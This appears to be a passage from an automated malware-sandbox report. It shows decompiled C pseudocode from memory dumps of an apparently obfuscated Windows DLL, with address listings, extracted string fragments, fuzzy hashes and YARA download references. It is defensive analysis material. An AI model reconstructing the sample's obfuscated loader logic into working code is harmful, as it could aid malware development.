				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				E6E17EA7D(_t48);
				_t50 =  *0x6e218995 & 0x000000ff;
				_t119 = 0;
				_t111 =  *0x6e2189f0; // 0xc8c83700
				asm("cdq");
				_t87 = _t102;
				 *0x6e222b18 = 0;
				_t103 =  *0x6e218988; // 0xfbec8649
				 *(_t127 - 0x10) = _t50;
				 *((intOrPtr*)(_t127 - 0x14)) = _t87;
				do {
					if(_t103 != _t50) {
						L7:
						_t11 = _t119 + 0x6e218990; // 0x866d3c9e
						_t88 =  *0x6e218980; // 0x955603b8
						_t52 =  *0x6e21899a & 0x000000ff;
						_t111 = _t111 + 0xb + _t88 - ( *_t11 & 0x000000ff) - _t103;
						_t139 =  *0x6e218980 - _t52; // 0x955603b8
						if(_t139 != 0) {
							_t50 =  *(_t127 - 0x10);
							_t87 =  *((intOrPtr*)(_t127 - 0x14));
							goto L9;
						}
					} else {
						_t138 =  *0x6e21898c - _t87; // 0x0
						if(_t138 == 0) {
							goto L9;
						} else {
							goto L7;
						}
					}
					break;
					L9:
					_t119 = _t119 + 1;
				} while (_t119 < 0x21);
				_t130 = _t129 - 0x10;
				 *0x6e222b18 = _t119;
				_t53 = _t130;
				 *0x6e2189f0 = _t111;
				 *((intOrPtr*)(_t127 - 0x14)) = _t130;
				 *(_t53 + 0xc) =  *(_t53 + 0xc) & 0x00000000;
				 *_t53 = 5;
				 *((intOrPtr*)(_t53 + 8)) = 0xe7c;
				 *(_t127 - 4) = 1;
				_push("dark Ru");
				_t54 = E6E181FAF(_t82, _t103, _t111, _t119);
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				E6E17EA7D(_t54);
				_t56 =  *0x6e21898c; // 0x0
				_t104 =  *0x6e218988; // 0xfbec8649
				_t120 =  *0x6e2189a0; // 0xf24087a
				_t92 = 0x2b;
				do {
					_t113 = _t104;
					 *(_t127 - 0x10) = _t56;
					_t142 = _t113 -  *0x6e2189b0; // 0xcf00cf05
					if(_t142 != 0 || _t56 != 0) {
						_t120 = _t120 + _t113 -  *0x6e218984 + 0xb;
						_t60 =  *0x6e218984; // 0xf02e13b7
						 *((intOrPtr*)(0x6e2189b0 + _t92 * 4)) =  *((intOrPtr*)(0x6e2189b0 + _t92 * 4)) - _t60;
						_t56 = 0;
						asm("sbb eax, eax");
						_t104 = _t120 -  *0x6e218984 - _t113;
						 *0x6e218988 = _t104;
						asm("sbb eax, [ebp-0x10]");
						 *0x6e21898c = 0;
					}
					_t92 = _t92 - 2;
					_t145 = _t92 - 2;
				} while (_t92 > 2);
				_t131 = _t130 - 0x10;
				 *0x6e2189a0 = _t120;
				_t121 = _t131;
				 *0x6e222b18 = _t92;
				 *((intOrPtr*)(_t127 - 0x14)) = _t131;
				 *((intOrPtr*)(_t121 + 8)) = 0;
				 *((intOrPtr*)(_t121 + 0xc)) = 0;
				 *_t121 = 3;
				 *((intOrPtr*)(_t121 + 8)) = E6E18BA61(_t82, "4577", 0, _t121, _t145);
				 *(_t127 - 4) = 2;
				_push("were T");
				_t62 = E6E181FAF(_t82, _t104, 0, _t121);
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				E6E17EA7D(_t62);
				_t122 =  *0x6e218988; // 0xfbec8649
				_t64 = E6E17D29E( *0x6e2189a4 & 0x000000ff);
				_t132 = _t131 - 0x10;
				 *0x6e218988 = _t64;
				_t65 =  *0x6e218984; // 0xf02e13b7
				 *0x6e21898c = 0;
				 *(_t127 - 0x10) = _t132;
				_t126 = _t132;
				 *0x6e218984 = _t65 + 0x2f + _t122 -  *0x6e2189f0 -  *0x6e2189f0 + _t64;
				 *((intOrPtr*)(_t126 + 8)) = 0;
				 *((intOrPtr*)(_t126 + 0xc)) = 0;
				 *_t126 = 3;
				 *((intOrPtr*)(_t126 + 8)) = E6E18BA61(_t82, "3949", 0, _t126, _t145);
				 *(_t127 - 4) = 3;
				_push("snow or");
				_t69 = E6E181FAF(_t82, _t104, 0, _t126);
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				E6E17EA7D(_t69);
				_t98 =  *0x6e2189f0; // 0xc8c83700
				 *0x6e21898c = 0;
				_t108 =  *0x6e218984 * 7 - _t98;
				 *0x6e218988 = _t108;
				if( *0x6e21899c == 0) {
					_t99 =  *0x6e218980; // 0x955603b8
					_t98 = _t99 - _t108 + 0xc;
					__eflags = _t98;
					 *0x6e2189f0 = _t98;
				} else {
					_t73 =  *0x6e218980; // 0x955603b8
					 *0x6e218980 = _t108 + (_t73 + 0xcda) * 2 + _t98;
				}
				return E6E1A9D88(_t98);
			}

APIs

__EH_prolog3.LIBCMT ref: 6E17E468

Strings

snow or, xrefs: 6E17E6B5
were T, xrefs: 6E17E641
dark Ru, xrefs: 6E17E597
4577, xrefs: 6E17E624
6282, xrefs: 6E17E4DF
Run Maste, xrefs: 6E17E4F8
3949, xrefs: 6E17E683

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: 3949$4577$6282$Run Maste$dark Ru$snow or$were T
API String ID: 431132790-1179637194
Opcode ID: 9badc2e75456bd96bdb66efff777deadd124d2270f6478600829a8dbad8f551b
Instruction ID: 16046111f4cbc869f61ed7dd04a047a964601886bf381519dffeb38114dbabab
Opcode Fuzzy Hash: 9badc2e75456bd96bdb66efff777deadd124d2270f6478600829a8dbad8f551b
Instruction Fuzzy Hash: 0471C1B1A01A068FCF18CFBCC59A5D9BBE6BB87704B14462DD1559BB50DB304B80DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0E20, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1D0E20(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int* _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int* _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed short _v772;
				void* __ebp;
				signed int _t147;
				void* _t154;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t164;
				intOrPtr _t165;
				signed int _t168;
				signed int _t170;
				void* _t171;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				signed int _t200;
				signed int _t202;
				signed int _t204;
				signed int _t209;
				signed int _t212;
				intOrPtr* _t220;
				intOrPtr* _t221;
				signed int _t230;
				intOrPtr _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				signed int _t241;
				void* _t248;
				signed int _t249;
				intOrPtr _t251;
				signed int _t257;
				signed int _t259;
				signed int _t262;
				signed int* _t263;
				intOrPtr* _t264;
				short _t265;
				signed int _t267;
				signed int _t273;
				void* _t275;
				void* _t277;

				_t288 = __fp0;
				_t267 = _t273;
				_t147 =  *0x6e21801c; // 0x57d971a9
				_v8 = _t147 ^ _t267;
				_push(__ebx);
				_t212 = _a8;
				_push(__esi);
				_push(__edi);
				_t251 = _a4;
				_v736 = _t212;
				_v724 = E6E1CF749(__ecx, __edx, __fp0) + 0x278;
				_t154 = E6E1D02A7(__edx, __fp0, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v712);
				_t275 = _t273 - 0x2e4 + 0x18;
				if(_t154 == 0) {
					L40:
					__eflags = 0;
					goto L41;
				} else {
					_t10 = _t212 + 2; // 0x6
					_t257 = _t10 << 4;
					_t157 =  &_v272;
					_v716 = _t257;
					_t220 =  *((intOrPtr*)(_t257 + _t251));
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t259 = _v716;
						if( *_t157 !=  *_t220) {
							break;
						}
						if( *_t157 == 0) {
							L7:
							_t158 = _v704;
						} else {
							_t265 =  *((intOrPtr*)(_t157 + 2));
							_v706 = _t265;
							_t259 = _v716;
							if(_t265 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L7;
								}
							}
						}
						L9:
						if(_t158 != 0) {
							_t221 =  &_v272;
							_t248 = _t221 + 2;
							do {
								_t159 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t221 - _t248 >> 1) + 1;
							_t162 = E6E1D1C1E(4 + ((_t221 - _t248 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L40;
							} else {
								_v728 =  *((intOrPtr*)(_t259 + _t251));
								_v740 =  *(_t251 + 0xa0 + _t212 * 4);
								_v744 =  *(_t251 + 8);
								_v708 = _t162 + 4;
								_t164 = E6E1CB0B9(_t162 + 4, _v720,  &_v272);
								_t277 = _t275 + 0xc;
								__eflags = _t164;
								if(_t164 != 0) {
									_t165 = _v728;
									_push(_t165);
									_push(_t165);
									_push(_t165);
									_push(_t165);
									_push(_t165);
									E6E1C22EF();
									asm("int3");
									_push(_t267);
									_t168 = (_v772 & 0x0000ffff) - 0x2d;
									__eflags = _t168;
									if(_t168 == 0) {
										L52:
										__eflags = 0;
										return 0;
									} else {
										_t170 = _t168 - 1;
										__eflags = _t170;
										if(_t170 == 0) {
											_t171 = 2;
											return _t171;
										} else {
											__eflags = _t170 == 0x31;
											if(_t170 == 0x31) {
												goto L52;
											} else {
												__eflags = 1;
												return 1;
											}
										}
									}
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t259 + _t251)) = _v708;
									if(_v272 != 0x43) {
										L18:
										_t177 = E6E1CFF49(_t212, _t251,  &_v700);
										_t230 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L18;
										} else {
											_t230 = _v704;
											_t177 = _t230;
										}
									}
									 *(_t251 + 0xa0 + _t212 * 4) = _t177;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t251 + 0x14)) = _v712;
											}
										} else {
											 *((intOrPtr*)(_t251 + 0x10)) = _v712;
										}
									} else {
										_t263 = _v724;
										_t249 = _t230;
										_t240 = _t263;
										 *(_t251 + 8) = _v712;
										_v708 = _t263;
										_v720 = _t263[8];
										_v712 = _t263[9];
										while(1) {
											__eflags =  *(_t251 + 8) -  *_t240;
											if( *(_t251 + 8) ==  *_t240) {
												break;
											}
											_t264 = _v708;
											_t249 = _t249 + 1;
											_t209 =  *_t240;
											 *_t264 = _v720;
											_v712 = _t240[1];
											_t240 = _t264 + 8;
											 *((intOrPtr*)(_t264 + 4)) = _v712;
											_t212 = _v736;
											_t263 = _v724;
											_v720 = _t209;
											_v708 = _t240;
											__eflags = _t249 - 5;
											if(_t249 < 5) {
												continue;
											} else {
											}
											L26:
											__eflags = _t249 - 5;
											if(__eflags == 0) {
												_t200 = E6E1D3BB2(_t212, _t249, _t251, _t263, __eflags, _t288, _v704, 1, 0x6e1f4fa0, 0x7f,  &_v528,  *(_t251 + 8), 1);
												_t277 = _t277 + 0x1c;
												__eflags = _t200;
												if(_t200 == 0) {
													_t241 = _v704;
												} else {
													_t202 = _v704;
													do {
														 *(_t267 + _t202 * 2 - 0x20c) =  *(_t267 + _t202 * 2 - 0x20c) & 0x000001ff;
														_t202 = _t202 + 1;
														__eflags = _t202 - 0x7f;
													} while (_t202 < 0x7f);
													_t204 = E6E1ABA27( &_v528,  *0x6e218194, 0xfe);
													_t277 = _t277 + 0xc;
													__eflags = _t204;
													_t241 = 0 | _t204 == 0x00000000;
												}
												_t263[1] = _t241;
												 *_t263 =  *(_t251 + 8);
											}
											 *(_t251 + 0x18) = _t263[1];
											goto L38;
										}
										__eflags = _t249;
										if(_t249 != 0) {
											 *_t263 =  *(_t263 + _t249 * 8);
											_t263[1] =  *(_t263 + 4 + _t249 * 8);
											 *(_t263 + _t249 * 8) = _v720;
											 *(_t263 + 4 + _t249 * 8) = _v712;
										}
										goto L26;
									}
									L38:
									_t178 = _t212 * 0xc;
									_t106 = _t178 + 0x6e1f5028; // 0x6e1616e7
									 *0x6e1ee1b4(_t251);
									_t180 =  *((intOrPtr*)( *_t106))();
									_t233 = _v728;
									__eflags = _t180;
									if(_t180 == 0) {
										__eflags = _t233 - 0x6e218258;
										if(_t233 != 0x6e218258) {
											_t262 = _t212 + _t212;
											__eflags = _t262;
											asm("lock xadd [eax], ecx");
											if(_t262 != 0) {
												goto L45;
											} else {
												E6E1D1BE4( *((intOrPtr*)(_t251 + 0x28 + _t262 * 8)));
												E6E1D1BE4( *((intOrPtr*)(_t251 + 0x24 + _t262 * 8)));
												E6E1D1BE4( *(_t251 + 0xa0 + _t212 * 4));
												_t236 = _v704;
												 *(_v716 + _t251) = _t236;
												 *(_t251 + 0xa0 + _t212 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t251 + 0x28 + (_t212 + _t212) * 8)) = _t234;
									} else {
										 *((intOrPtr*)(_v716 + _t251)) = _t233;
										E6E1D1BE4( *(_t251 + 0xa0 + _t212 * 4));
										 *(_t251 + 0xa0 + _t212 * 4) = _v740;
										E6E1D1BE4(_v732);
										 *(_t251 + 8) = _v744;
										goto L40;
									}
									goto L41;
								}
							}
						} else {
							L41:
							return E6E1A93EA(_v8 ^ _t267);
						}
						goto L53;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L9;
				}
				L53:
			}

0x6e1d0e20
0x6e1d0e23
0x6e1d0e2b
0x6e1d0e32
0x6e1d0e35
0x6e1d0e36
0x6e1d0e39
0x6e1d0e3d
0x6e1d0e3e
0x6e1d0e41
0x6e1d0e51
0x6e1d0e74
0x6e1d0e79
0x6e1d0e7e
0x6e1d1156
0x6e1d1156
0x00000000
0x6e1d0e84
0x6e1d0e84
0x6e1d0e87
0x6e1d0e8a
0x6e1d0e90
0x6e1d0e99
0x6e1d0e9b
0x6e1d0e9e
0x6e1d0ea8
0x6e1d0eae
0x00000000
0x00000000
0x6e1d0eb4
0x6e1d0edd
0x6e1d0edd
0x6e1d0eb6
0x6e1d0eb6
0x6e1d0ebe
0x6e1d0ec5
0x6e1d0ecb
0x00000000
0x6e1d0ecd
0x6e1d0ecd
0x6e1d0ed0
0x6e1d0edb
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d0edb
0x6e1d0ecb
0x6e1d0eea
0x6e1d0eec
0x6e1d0ef5
0x6e1d0efb
0x6e1d0efe
0x6e1d0efe
0x6e1d0f01
0x6e1d0f04
0x6e1d0f04
0x6e1d0f14
0x6e1d0f22
0x6e1d0f27
0x6e1d0f2e
0x6e1d0f30
0x00000000
0x6e1d0f36
0x6e1d0f3c
0x6e1d0f49
0x6e1d0f52
0x6e1d0f65
0x6e1d0f6c
0x6e1d0f71
0x6e1d0f74
0x6e1d0f76
0x6e1d11d6
0x6e1d11dc
0x6e1d11dd
0x6e1d11de
0x6e1d11df
0x6e1d11e0
0x6e1d11e1
0x6e1d11e6
0x6e1d11e9
0x6e1d11f0
0x6e1d11f0
0x6e1d11f3
0x6e1d1209
0x6e1d1209
0x6e1d120c
0x6e1d11f5
0x6e1d11f5
0x6e1d11f5
0x6e1d11f8
0x6e1d1206
0x6e1d1208
0x6e1d11fa
0x6e1d11fa
0x6e1d11fd
0x00000000
0x6e1d11ff
0x6e1d1201
0x6e1d1203
0x6e1d1203
0x6e1d11fd
0x6e1d11f8
0x6e1d0f7c
0x6e1d0f7c
0x6e1d0f8a
0x6e1d0f8d
0x6e1d0fa3
0x6e1d0faa
0x6e1d0fb0
0x6e1d0f8f
0x6e1d0f8f
0x6e1d0f97
0x00000000
0x6e1d0f99
0x6e1d0f99
0x6e1d0f9f
0x6e1d0f9f
0x6e1d0f97
0x6e1d0fb6
0x6e1d0fbd
0x6e1d0fc0
0x6e1d10e0
0x6e1d10e3
0x6e1d10f0
0x6e1d10f3
0x6e1d10fb
0x6e1d10fb
0x6e1d10e5
0x6e1d10eb
0x6e1d10eb
0x6e1d0fc6
0x6e1d0fc6
0x6e1d0fcc
0x6e1d0fd4
0x6e1d0fd6
0x6e1d0fd9
0x6e1d0fe2
0x6e1d0feb
0x6e1d0ff1
0x6e1d0ff4
0x6e1d0ff6
0x00000000
0x00000000
0x6e1d0ff8
0x6e1d0ffe
0x6e1d0fff
0x6e1d100a
0x6e1d1012
0x6e1d101a
0x6e1d101d
0x6e1d1020
0x6e1d1026
0x6e1d102c
0x6e1d1032
0x6e1d1038
0x6e1d103b
0x00000000
0x00000000
0x6e1d103d
0x6e1d1062
0x6e1d1062
0x6e1d1065
0x6e1d1082
0x6e1d1087
0x6e1d108a
0x6e1d108c
0x6e1d10ca
0x6e1d108e
0x6e1d108e
0x6e1d1094
0x6e1d1099
0x6e1d10a1
0x6e1d10a2
0x6e1d10a2
0x6e1d10b9
0x6e1d10c0
0x6e1d10c3
0x6e1d10c5
0x6e1d10c5
0x6e1d10d0
0x6e1d10d6
0x6e1d10d6
0x6e1d10db
0x00000000
0x6e1d10db
0x6e1d103f
0x6e1d1041
0x6e1d1046
0x6e1d104c
0x6e1d1055
0x6e1d105e
0x6e1d105e
0x00000000
0x6e1d1041
0x6e1d10fe
0x6e1d10fe
0x6e1d1102
0x6e1d110a
0x6e1d1110
0x6e1d1113
0x6e1d1119
0x6e1d111b
0x6e1d1167
0x6e1d116d
0x6e1d1174
0x6e1d1174
0x6e1d117a
0x6e1d117e
0x00000000
0x6e1d1180
0x6e1d1184
0x6e1d118d
0x6e1d1199
0x6e1d11a7
0x6e1d11ad
0x6e1d11b0
0x6e1d11b0
0x6e1d117e
0x6e1d11bf
0x6e1d11c7
0x6e1d11d0
0x6e1d111d
0x6e1d1123
0x6e1d112d
0x6e1d113f
0x6e1d1146
0x6e1d1153
0x00000000
0x6e1d1153
0x00000000
0x6e1d111b
0x6e1d0f76
0x6e1d0eee
0x6e1d1158
0x6e1d1166
0x6e1d1166
0x00000000
0x6e1d0eec
0x6e1d0ee5
0x6e1d0ee7
0x6e1d0ee7
0x00000000
0x6e1d0ee7
0x00000000

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(00000008,?,00000000,6E1D8773,6E1913C8,6E191439,?,6E191225,00000000,00000000), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,00000006,000000FF,?,6E191225,00000000,00000000), ref: 6E1CF7EC

_free.LIBCMT ref: 6E1D112D
_free.LIBCMT ref: 6E1D1146
_free.LIBCMT ref: 6E1D1184
_free.LIBCMT ref: 6E1D118D
_free.LIBCMT ref: 6E1D1199

Strings

C, xrefs: 6E1D0F7C

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 4f16257390f5151eb90638af5b2864736796135233236c0ef1156d0f2ba98c04
Instruction ID: ddd3a354dbda9d5acd840038cd448aea3d1637a931d96cd5816d24d6bd7ddb40
Opcode Fuzzy Hash: 4f16257390f5151eb90638af5b2864736796135233236c0ef1156d0f2ba98c04
Instruction Fuzzy Hash: 56C16C75A0121A9FDB24DFA8C894B9DB7B5FF18304F2045AAD809A7350E731AEC8DF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E17E0C5, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E6E17E0C5(void* __ebx, void* __edi, void* __esi) {
				void* _t87;
				signed short _t90;
				signed short _t93;
				signed short _t96;
				signed short _t97;
				signed short _t101;
				signed int _t106;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				void* _t117;
				signed int _t118;
				signed int _t120;
				signed short _t123;
				void* _t129;
				signed int _t135;
				signed char _t151;
				signed int _t152;
				signed short _t157;
				signed short _t159;
				void* _t160;
				signed int _t163;
				signed int _t165;
				signed short _t166;
				intOrPtr _t169;
				signed short _t170;
				signed short _t172;
				intOrPtr _t175;
				signed short _t180;
				signed short _t192;
				signed short _t197;
				intOrPtr _t198;
				intOrPtr _t200;
				signed short _t203;
				signed short _t204;
				signed short _t206;
				intOrPtr _t214;
				signed short _t215;
				void* _t217;
				signed short _t218;
				intOrPtr _t220;
				signed short _t221;
				intOrPtr _t222;
				signed int _t223;
				intOrPtr _t224;
				signed short _t225;
				signed int _t227;
				signed short _t228;
				signed short _t230;
				signed short _t231;
				signed int _t232;
				signed short _t234;
				signed short _t235;
				signed int _t236;
				void* _t237;
				void* _t244;
				signed int _t261;

				_t158 = __ebx;
				E6E1A9DF3(0x6e1e9dcb, __ebx, __edi, __esi, 0x58);
				_t197 =  *0x6e2189a0; // 0xf24087a
				_t159 =  *0x6e2189f0; // 0xc8c83700
				_t227 = _t197 & 0x0000ffff;
				 *(_t237 - 0x30) = _t227;
				 *(_t237 - 0x34) = _t159 - _t227 - 0x00000004 & 0x0000ffff;
				_t3 = _t197 + 3; // 0xf24087d
				_t214 = 0x2b;
				_t198 = _t214;
				_t215 =  *(_t237 - 0x34);
				 *0x6e218980 = _t3 + _t159;
				do {
					_t228 = _t159;
					if(_t228 != ( *0x6e218990 & 0x000000ff)) {
						_t215 = _t215 + _t228 -  *(_t237 - 0x30) + 0xb;
						_t157 =  *0x6e2189a0; // 0xf24087a
						 *((intOrPtr*)(_t198 + 0x6e218990)) =  *((intOrPtr*)(_t198 + 0x6e218990)) - _t157;
						_t159 = (_t215 & 0x0000ffff) - _t228 - _t157;
						 *0x6e2189f0 = _t159;
						_t228 = _t159;
					}
					_t198 = _t198 - 2;
					_t241 = _t198 - 2;
				} while (_t198 > 2);
				_push(_t159);
				_push("(Get M");
				_t160 = _t237 - 0x64;
				 *0x6e222b18 = _t198;
				_t230 = _t228 -  *0x6e218980 + _t215 + 0xb;
				_t87 = E6E17E808(_t158, _t160, _t215 + 0xb, _t230, _t241);
				 *(_t237 - 4) =  *(_t237 - 4) & 0x00000000;
				_push(_t160);
				 *((char*)(_t237 - 0x29)) = E6E181D8C(_t158, _t160, _t87);
				 *(_t237 - 4) =  *(_t237 - 4) | 0xffffffff;
				E6E17E7B1(_t241);
				_t242 =  *((char*)(_t237 - 0x29));
				_t217 = 0x2b;
				if( *((char*)(_t237 - 0x29)) != 0) {
					E6E181DAF(_t158, "office b", _t217, _t230, _t242);
				}
				_t90 =  *0x6e218980; // 0x955603b8
				_t163 = _t230 & 0x0000ffff;
				 *0x6e218980 = _t90 + 0x6893 + _t163;
				_t93 =  *0x6e2189f0; // 0xc8c83700
				 *(_t237 - 0x38) = _t93 - _t163 + 0xc;
				_t96 = E6E17D3E7();
				_t165 =  *0x6e218995 & 0x000000ff;
				_t200 = 0;
				_t218 =  *0x6e2189f0; // 0xc8c83700
				_t97 = _t96 & 0x0000ffff;
				_t231 = _t97 & 0x0000ffff;
				 *(_t237 - 0x34) = _t97;
				 *(_t237 - 0x3c) = _t231;
				 *0x6e222b18 = 0;
				 *(_t237 - 0x2a) = _t165;
				L8:
				while(1) {
					if(_t97 == _t165) {
						_t232 = _t231 & 0x0000ffff;
						goto L12;
					} else {
						_t192 =  *0x6e218980; // 0x955603b8
						_t232 = _t97 & 0x0000ffff;
						_t21 = _t200 + 0x6e218990; // 0x866d3c9e
						_t151 =  *0x6e21899a; // 0xb8c846e3
						_t152 = _t151 & 0x000000ff;
						_t218 = _t218 + 0xb + _t192 - ( *_t21 & 0x000000ff) - _t232;
						_t244 =  *0x6e218980 - _t152; // 0x955603b8
						if(_t244 != 0) {
							_t97 =  *(_t237 - 0x34);
							_t165 =  *(_t237 - 0x2a);
							L12:
							_t200 = _t200 + 1;
							 *0x6e222b18 = _t200;
							if(_t200 < 0x21) {
								_t231 =  *(_t237 - 0x3c);
								continue;
							}
						}
					}
					_t166 = _t218;
					 *(_t237 - 0x30) = _t218;
					 *0x6e218984 = _t232 - _t166 +  *(_t237 - 0x38) + 0x24;
					_t101 =  *0x6e218980; // 0x955603b8
					 *0x6e2189f0 = _t101 + 0xb + _t166 - _t232;
					E6E17ECE1(_t237 - 0x28, "Run phra");
					 *(_t237 - 4) = 1;
					_t203 =  *0x6e218980; // 0x955603b8
					_t220 = 0x2b;
					_t169 = _t220;
					_t221 =  *0x6e2189f0; // 0xc8c83700
					do {
						 *(_t237 - 0x2c) = _t203;
						if(_t203 != ( *0x6e218990 & 0x000000ff)) {
							_t221 = _t221 + _t203 - _t232 + 0xb;
							 *((intOrPtr*)(_t169 + 0x6e218990)) =  *((intOrPtr*)(_t169 + 0x6e218990)) -  *(_t237 - 0x34);
							_t203 = _t221 -  *(_t237 - 0x2c) - _t232;
							 *0x6e2189f0 = _t221;
							 *(_t237 - 0x2c) = _t203;
						}
						_t169 = _t169 - 2;
						_t249 = _t169 - 2;
					} while (_t169 > 2);
					_t106 =  *0x6e218984; // 0xf02e13b7
					 *0x6e222b18 = _t169;
					_t170 = _t221;
					 *(_t237 - 0x30) = _t221;
					_t172 = _t170 -  *(_t237 - 0x2c) - _t232;
					_push(_t172);
					 *0x6e218980 = _t172;
					_push("(Hundre)(.*)");
					 *0x6e218984 = _t170 + (_t106 + 0xcda) * 2 + _t232;
					E6E17E808(_t158, _t237 - 0x50, _t221, _t232, _t249);
					 *(_t237 - 4) = 2;
					_t111 = E6E17D3E7();
					_t204 =  *0x6e218980; // 0x955603b8
					_t112 = _t111 & 0x0000ffff;
					 *(_t237 - 0x30) = _t112;
					_t113 = _t112 & 0x0000ffff;
					 *(_t237 - 0x34) = _t113;
					_t42 = _t204 + 3; // 0x955603bb
					_t234 = _t42 + _t113;
					_t222 = 0x2b;
					 *0x6e2189f0 = _t234;
					_t175 = _t222;
					 *0x6e218984 = _t113 + 3 + _t234;
					_t223 =  *(_t237 - 0x34);
					do {
						 *(_t237 - 0x2c) = _t204;
						if(_t204 != ( *0x6e218990 & 0x000000ff)) {
							_t234 = _t234 + _t204 - _t223 + 0xb;
							 *((intOrPtr*)(_t175 + 0x6e218990)) =  *((intOrPtr*)(_t175 + 0x6e218990)) -  *(_t237 - 0x30);
							_t204 = _t234 - _t223 -  *(_t237 - 0x2c);
							 *0x6e218980 = _t204;
						}
						_t175 = _t175 - 2;
					} while (_t175 > 2);
					 *0x6e222b18 = _t175;
					_push(_t175);
					 *0x6e2189f0 = _t234;
					_t117 = E6E181F72(_t237 - 0x28, _t237 - 0x50);
					_t224 = 0x2b;
					_t254 = _t117;
					if(_t117 != 0) {
						E6E181DAF(_t158, "Protec\n", _t224, _t234, _t254);
					}
					_t118 =  *0x6e218984; // 0xf02e13b7
					_t206 =  *0x6e2189f0; // 0xc8c83700
					_t180 =  *0x6e218980; // 0x955603b8
					_t120 =  *(_t237 - 0x34) + 0x19b4 + _t118 * 2 + _t206;
					 *0x6e218984 = _t120;
					_t123 = _t120 - _t206 -  *(_t237 - 0x30) & 0x0000ffff;
					 *(_t237 - 0x34) = _t123;
					 *(_t237 - 0x38) = _t123 & 0x0000ffff;
					do {
						_t235 = _t180;
						 *(_t237 - 0x30) = _t235;
						if(_t235 == ( *0x6e218990 & 0x000000ff)) {
							_t236 =  *(_t237 - 0x38) & 0x0000ffff;
						} else {
							_t236 =  *(_t237 - 0x34) & 0x0000ffff;
							_t206 = _t206 + _t180 - _t236 + 0xb;
							 *((intOrPtr*)(_t224 + 0x6e218990)) =  *((intOrPtr*)(_t224 + 0x6e218990)) -  *(_t237 - 0x34);
							_t180 = _t206 - _t236 -  *(_t237 - 0x30);
							 *0x6e218980 = _t180;
						}
						_t224 = _t224 - 2;
					} while (_t224 > 2);
					_t182 =  >=  ?  *((void*)(_t237 - 0x28)) : _t237 - 0x28;
					_t128 =  *((intOrPtr*)(_t237 - 0x18)) + ( >=  ?  *((void*)(_t237 - 0x28)) : _t237 - 0x28);
					 *0x6e222b18 = _t224;
					_t184 =  >=  ?  *((void*)(_t237 - 0x28)) : _t237 - 0x28;
					 *0x6e2189f0 = _t206;
					_t129 = E6E181F99(_t237 - 0x50,  >=  ?  *((void*)(_t237 - 0x28)) : _t237 - 0x28,  *((intOrPtr*)(_t237 - 0x18)) + ( >=  ?  *((void*)(_t237 - 0x28)) : _t237 - 0x28));
					_t225 =  *0x6e2189f0; // 0xc8c83700
					if(_t129 != 0) {
						_t72 = _t225 + 3; // 0xc8c83703
